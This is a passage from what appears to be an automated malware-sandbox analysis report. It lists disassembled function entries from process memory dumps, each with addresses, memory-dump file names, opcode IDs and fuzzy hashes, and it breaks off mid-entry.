                                        Function 00007FFD9BAD0672 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: deb60c9b17b63dc1e74808ca8c331ed1c2a136b2bdd700562961d0f1f88adb17
                                        • Instruction ID: 513e7b9356a5123234c1194b01396d2e85083905fab577f16919887494c9977e
                                        • Opcode Fuzzy Hash: deb60c9b17b63dc1e74808ca8c331ed1c2a136b2bdd700562961d0f1f88adb17
                                        • Instruction Fuzzy Hash: A2114C3090968D8FCF45EF68C8589EA7FF0FF69304F0145AAE448D71A1D7349554CB81
                                        Function 00007FFD9BAFBB10 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3deaba20f80d61809e99b1e4ebd6956b2314ab1240d26be70bb20bbc68b89b01
                                        • Instruction ID: e14b8f8972163728c76f864cbb69bab9831faa19faa2e30b10e81f72b0594995
                                        • Opcode Fuzzy Hash: 3deaba20f80d61809e99b1e4ebd6956b2314ab1240d26be70bb20bbc68b89b01
                                        • Instruction Fuzzy Hash: 1C11C570914A4D8FDF84EF58C859AEE7BF1FB68305F10052AE85AE3290DB71E590CB81
                                        Function 00007FFD9BAC86FD Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAC7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bac7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58e00750c6fead2c133359c08383441e8730084a0e282958fb877e697fbbf398
                                        • Instruction ID: 23b2fc80f75be8aa57b1ad2db726c5b0ab2f60ef53a97b5df66fe0cd29215cf2
                                        • Opcode Fuzzy Hash: 58e00750c6fead2c133359c08383441e8730084a0e282958fb877e697fbbf398
                                        • Instruction Fuzzy Hash: 06014932E0E64D8BE750AB54D8661FDBBE0FF85320F520176D50C871D6DE781209C741
                                        Function 00007FFD9BAE9F19 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bae8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a33ceba6607db1ff23179ca0a5188bdbe4df1b1d1767fe4315dc95807c71b57
                                        • Instruction ID: e08abe75a48a3991bff59e70746c51adc8631833595cbe8e6665e22b6c25b4ad
                                        • Opcode Fuzzy Hash: 7a33ceba6607db1ff23179ca0a5188bdbe4df1b1d1767fe4315dc95807c71b57
                                        • Instruction Fuzzy Hash: DD115E7090864D8FCF85EF68C858AED7BF0FF29300F0101AAE809D7261DB349954CB80
                                        Function 00007FFD9BC72799 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1892592036.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1006e421ea6408b31d01a5c2ac2a54b694dd36ddb0e2d3a8dda6f58137daa99
                                        • Instruction ID: 1b15e5ce6b0ccec9f3a78a3dd5d8ada7d1fc4d914b1a4c59bdf80ff092356090
                                        • Opcode Fuzzy Hash: e1006e421ea6408b31d01a5c2ac2a54b694dd36ddb0e2d3a8dda6f58137daa99
                                        • Instruction Fuzzy Hash: 6D118E3090968D8FCB85DF68C8559EE7BF0FF29300F0501AAE859C71A1DB34AA54CB81
                                        Function 00007FFD9BAF5C99 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bae8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8356b166b152b2a357cdd052571dfde311a2cf4502e26784874906396798e52a
                                        • Instruction ID: f7fd212916ec650eb80a2d0bdadf0001441418e53a3e723e27d9c615cd466b1d
                                        • Opcode Fuzzy Hash: 8356b166b152b2a357cdd052571dfde311a2cf4502e26784874906396798e52a
                                        • Instruction Fuzzy Hash: DE11093090864D8FCF85EF68C899AEE7BF0FF68304F0505AAE459D7261DB34A594CB81
                                        Function 00007FFD9BAFB519 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ecd68eae209e52c05b6b45a5efe95f3cf8b25918c75ca069508cf5613af1c40a
                                        • Instruction ID: eb9ff80a38de947f5d7873e0d3c70a0170d6ce263fe4415d0362d6d1fd922e73
                                        • Opcode Fuzzy Hash: ecd68eae209e52c05b6b45a5efe95f3cf8b25918c75ca069508cf5613af1c40a
                                        • Instruction Fuzzy Hash: 32113C7090868D8FCF45EF68C899AE97FF0FF29305F05019AE859D72A1DB349554CB81
                                        Function 00007FFD9BAC8EA1 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAC7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bac7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7327df872f1b97de6dfa8f4993330a1b6cb5b925624714ccf73c82cb7388030
                                        • Instruction ID: 0212f74ea61f873a0eb8c880408bb5ff497add958746b884e3b09b4badeffa8e
                                        • Opcode Fuzzy Hash: e7327df872f1b97de6dfa8f4993330a1b6cb5b925624714ccf73c82cb7388030
                                        • Instruction Fuzzy Hash: D4010471A1968C8FCB45EF18C851AE93BF0FF59304F0601A6E859C7261D734E954CB81
                                        Function 00007FFD9BC72949 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1892592036.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aeffbb3c6ae0716d971f3e29a223a408d7b30e9bc5a21a8c2e8049395d79f425
                                        • Instruction ID: 7a062826f8d3951e7cdc9bc600baac91d3152c9d4a29158891f94d87fa9ca437
                                        • Opcode Fuzzy Hash: aeffbb3c6ae0716d971f3e29a223a408d7b30e9bc5a21a8c2e8049395d79f425
                                        • Instruction Fuzzy Hash: FE01407090978D8FDB45DF68C8959D97FF0FF19300F0501AAE459C71A2DB34A995CB41
                                        Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f23d8c17eb37c4b4adb0ba2c354a3f5c3856b277f1ccb98492867aaa0f008cf3
                                        • Instruction ID: 54cb4bab3fed56d3cb1db31087902c3bd51bc2493aafcb5316088dcfb1b14692
                                        • Opcode Fuzzy Hash: f23d8c17eb37c4b4adb0ba2c354a3f5c3856b277f1ccb98492867aaa0f008cf3
                                        • Instruction Fuzzy Hash: 0F11E571A0E29D8FE722ABA4C8202E97B70AF42310F0542B7D0559B1E3CB786614CB85
                                        Function 00007FFD9BAFE579 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 887487d623fd5129adfd78c61c71e5ab052b81c07e6ef0e6b84dac33821700b0
                                        • Instruction ID: 64ea284df885c91c51596013976f0917e43d78574cc268569608194573f2d929
                                        • Opcode Fuzzy Hash: 887487d623fd5129adfd78c61c71e5ab052b81c07e6ef0e6b84dac33821700b0
                                        • Instruction Fuzzy Hash: 7401007090964D8FCF85EF68C858AAA7FF0FF69305F05059BE418D71A1D7349994CB41
                                        Function 00007FFD9BC72AE9 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1892592036.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6aee9574d44074895831ef5528c22cf7aa7e055a83bb8ddd67466db7e57cd74f
                                        • Instruction ID: 3572712e38e6e604210dd2208e439468f061795f8d5acd80c7494d14548d9188
                                        • Opcode Fuzzy Hash: 6aee9574d44074895831ef5528c22cf7aa7e055a83bb8ddd67466db7e57cd74f
                                        • Instruction Fuzzy Hash: C6015E30908A4D8FCF85EF68C858AAE7BF0FF29301F05019BE418D72A1DB349594CB40
                                        Function 00007FFD9BAEFA69 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bae8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2717fb624d1c899a432206d7fca2639cdc288bc1c111ecd94ac2e1c39a25959c
                                        • Instruction ID: b59f203be6c6d8ddca948fc10f34497a1eaca5434b0792694915c84cc3df0cbe
                                        • Opcode Fuzzy Hash: 2717fb624d1c899a432206d7fca2639cdc288bc1c111ecd94ac2e1c39a25959c
                                        • Instruction Fuzzy Hash: 5701403090864D8FDF85EF58C898AEA7FF0FF69301F0501AAD418D7261DB359554CB80
                                        Function 00007FFD9BAEF999 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bae8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b5badea0ab5223b4b918da346748b0e479db16ae8c0473e970dc78167f97626
                                        • Instruction ID: 5ad13bfec38ba7fd476546626b625c6bfe5452a7f16043914c5abb9ef81455d5
                                        • Opcode Fuzzy Hash: 0b5badea0ab5223b4b918da346748b0e479db16ae8c0473e970dc78167f97626
                                        • Instruction Fuzzy Hash: E9012D3190864D8FDF85EF58C898AEA7BF0FF25300F0501AAD418D7261DB359554CB80
                                        Function 00007FFD9BAFDBA9 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e0045f82cfbe06d88ce8f71dadce7b43795d3ed2a943a3d5428727bf266d17fd
                                        • Instruction ID: daaa41f50b4d169f1388345c8448de5e1325769cd38044c4ea7066f08f3184a7
                                        • Opcode Fuzzy Hash: e0045f82cfbe06d88ce8f71dadce7b43795d3ed2a943a3d5428727bf266d17fd
                                        • Instruction Fuzzy Hash: 91014C3090978D8FCF46EF28C865AD97FB0FF29305F0541AAE449C71A1DB34A994CB81
                                        Function 00007FFD9BADA0F7 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ec72d129cee2b352ed78a2c1322bf2a1127db656ed5544ca3ad82f9d8a7f39e
                                        • Instruction ID: 1569200bc3b5085c2a79d584e163cefb29bb7ec8ef3d27b0355c710b858aaa51
                                        • Opcode Fuzzy Hash: 9ec72d129cee2b352ed78a2c1322bf2a1127db656ed5544ca3ad82f9d8a7f39e
                                        • Instruction Fuzzy Hash: F411B331A4952ECEEB70EB44C858BA9B3F1FB98311F0042E5C10DD76A1DB746A84DF10
                                        Function 00007FFD9BAFCF39 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf526f04341f840309f95e2ca2361fbad2209e29325290334cb6f21ef931fe26
                                        • Instruction ID: 7ed5abc8c83bc0b42cfafbe497de1e8b1bdeedac04c8a11cb1a68507bc907b2e
                                        • Opcode Fuzzy Hash: bf526f04341f840309f95e2ca2361fbad2209e29325290334cb6f21ef931fe26
                                        • Instruction Fuzzy Hash: 95012930909B8C8FCB85EF68C859AD97FF0FF69304F0501AAD449C71A2DB35A954CB81
                                        Function 00007FFD9BC71A69 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1892592036.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd5b1e82767258a690f2b43abeb09b8fd7fe6bfff29ca4008a9597c0b10d3500
                                        • Instruction ID: 802eba5e41ba9e2668b5599d645e074e4ada710bbbca1c7847897cfec5ff23ff
                                        • Opcode Fuzzy Hash: cd5b1e82767258a690f2b43abeb09b8fd7fe6bfff29ca4008a9597c0b10d3500
                                        • Instruction Fuzzy Hash: 11014C30909A8D8FCB45EF28C8A9A997FF0FF69301F0541AAE448C71A1D734D954CB81
                                        Function 00007FFD9BB06230 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f447873ab3fc59ce2d490a449aa2acb623ad41c1132e046767c1fc030f9d5c7e
                                        • Instruction ID: ca3b38e84c32b5e9b2442d1d97ed2a5092048062592133bc5313124260e2d7f3
                                        • Opcode Fuzzy Hash: f447873ab3fc59ce2d490a449aa2acb623ad41c1132e046767c1fc030f9d5c7e
                                        • Instruction Fuzzy Hash: 7B01A870914A4D9FDF84EF68C849AEE7BF0FB68305F00456AA85DD3264DB31E694CB81
                                        Function 00007FFD9BB06150 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3168118ece6dfc6689fe0c93b081dd9a93c83703b9282b32ffe276aac54ba82b
                                        • Instruction ID: 171a8bf116fbfe692279b55366cc96fc2fb723e8c19f8f85a8bfee837a824f8c
                                        • Opcode Fuzzy Hash: 3168118ece6dfc6689fe0c93b081dd9a93c83703b9282b32ffe276aac54ba82b
                                        • Instruction Fuzzy Hash: F001A870914A4D9FDF84EF68C849AEE7BF0FB68305F00456AA85DD3264DB31E594CB81
                                        Function 00007FFD9BAF3641 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bae8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 851b19afde8c4654b1f79ec5576cdb2b23b1dde74e3077215c78bf2be1a6c1a0
                                        • Instruction ID: 7a7fdc35ab07881351e26244abe26cee869955679c1b258f9b945a01358569dc
                                        • Opcode Fuzzy Hash: 851b19afde8c4654b1f79ec5576cdb2b23b1dde74e3077215c78bf2be1a6c1a0
                                        • Instruction Fuzzy Hash: 5B01627091978D8FDB90EF68C8596D97FE0FF18305F0101AAE808C72A1DB34A554CB41
                                        Function 00007FFD9BAD0690 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0121718af98ae8d73a25723be82064918f883fcf72db0c17d5f326e850ac49dd
                                        • Instruction ID: 7e19b0a595a2610ba2add4989dbbc5a963adb1f6fc102331380d8890f6785674
                                        • Opcode Fuzzy Hash: 0121718af98ae8d73a25723be82064918f883fcf72db0c17d5f326e850ac49dd
                                        • Instruction Fuzzy Hash: 6401A870914A4D9FDF84EF58C859AEEBBF0FB68305F00456AA81DD3260DB70A694CB81
                                        Function 00007FFD9BAEBD05 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bae8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe403b6afa9d1ce01483f35f3e916632f31990d3c0762e200f85a5673f5035fc
                                        • Instruction ID: aa8789bedd8033be1ef794cdcefdd250da72ad8c2f0e133d2bbf82e3c835fa52
                                        • Opcode Fuzzy Hash: fe403b6afa9d1ce01483f35f3e916632f31990d3c0762e200f85a5673f5035fc
                                        • Instruction Fuzzy Hash: 33011D70908A4D8FDF95EF58C899AA97BF0FF68300F4540E6E948C7261DA74D594CB40
                                        Function 00007FFD9BAD3D2E Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13af84f814604683c6b794c4d8bf2593de514a984a4fb271e85b6af2d03c7c52
                                        • Instruction ID: c7d1abaa91616d6410de9504b0e66bb42a7fe4c2cd11889c2d23dddff80d66c2
                                        • Opcode Fuzzy Hash: 13af84f814604683c6b794c4d8bf2593de514a984a4fb271e85b6af2d03c7c52
                                        • Instruction Fuzzy Hash: 35015B7091A65D8FDB61EB64C869AF8B7B1FF59300F0002FAD00CD71A6DB785A888B40
                                        Function 00007FFD9BB09BB9 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5bf1c53364513e09c5f036c121c6d9ba64a03a71011e559e2d89990d2543cfbe
                                        • Instruction ID: 0436d5f9e1640bdcea0ff195e934d5b6bf601a416b910688524d059cc55dbcbd
                                        • Opcode Fuzzy Hash: 5bf1c53364513e09c5f036c121c6d9ba64a03a71011e559e2d89990d2543cfbe
                                        • Instruction Fuzzy Hash: 53015E3090968D8FDB85EF68C858AAD7BB0FF25300F0500DBD458C71A2DB349994CB40
                                        Function 00007FFD9BB03139 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ad4bbe6de94d9e8a6770e0d6f99076581361355e0370519759b814a62168637
                                        • Instruction ID: 5c46bb2842fe643924947f3a82b2b1b94ae803bc7d3441f3aa2480ef9db4fe6b
                                        • Opcode Fuzzy Hash: 6ad4bbe6de94d9e8a6770e0d6f99076581361355e0370519759b814a62168637
                                        • Instruction Fuzzy Hash: C301623190978C8FCB85DF64C865AA97FB0FF69304F0541EAD449C72A2D735A994CB41
                                        Function 00007FFD9BAC9395 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAC7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bac7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a22e82e8bd77bf721adee87e591f1d49c7257cc7e5dc855af16d9054e26f18fa
                                        • Instruction ID: 76f99d0fa98894337c890a4b3e103ef18eea59d4d65eb1ecc2d45c85625a9944
                                        • Opcode Fuzzy Hash: a22e82e8bd77bf721adee87e591f1d49c7257cc7e5dc855af16d9054e26f18fa
                                        • Instruction Fuzzy Hash: 4501FD3591878C8FCB44EF18C8569E93BF0FF58304F0102AAE84887291CB38E654CB82
                                        Function 00007FFD9BC72F59 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1892592036.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7cd15fffdc530bfcbe0cd7aa3cab5b1e63fac0d8f533f19be6f3257313ee4479
                                        • Instruction ID: ef33752d7cddde41adbec7cb35accb830414fa3a05aacf352bdefdf6a31b9e98
                                        • Opcode Fuzzy Hash: 7cd15fffdc530bfcbe0cd7aa3cab5b1e63fac0d8f533f19be6f3257313ee4479
                                        • Instruction Fuzzy Hash: C8018F3090968C8FCB45DF64C894AD97FB0FF59300F0501AAD408C71A1CB359995CB80
                                        Function 00007FFD9BAD53DB Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be4dc3e601030a98f5f6b0fb7dbf018e1113ed0787a94a399784572a4042e27c
                                        • Instruction ID: 19f4e585b8d4c9c937e7da3eb266f31b97be86e00d1450e1d0e8dd5d2bb51127
                                        • Opcode Fuzzy Hash: be4dc3e601030a98f5f6b0fb7dbf018e1113ed0787a94a399784572a4042e27c
                                        • Instruction Fuzzy Hash: 0E016271A0998D8FDFE9DF08C8A46B577A1FF98240F4142E5E40DD7296DE706A458B40
                                        Function 00007FFD9BAD4972 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a923c094ef912e4338ea3182f216ba719a1b43357ba9d01d362008d590c55fcf
                                        • Instruction ID: 19f4e585b8d4c9c937e7da3eb266f31b97be86e00d1450e1d0e8dd5d2bb51127
                                        • Opcode Fuzzy Hash: a923c094ef912e4338ea3182f216ba719a1b43357ba9d01d362008d590c55fcf
                                        • Instruction Fuzzy Hash: 0E016271A0998D8FDFE9DF08C8A46B577A1FF98240F4142E5E40DD7296DE706A458B40
                                        Function 00007FFD9BAFB5F9 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
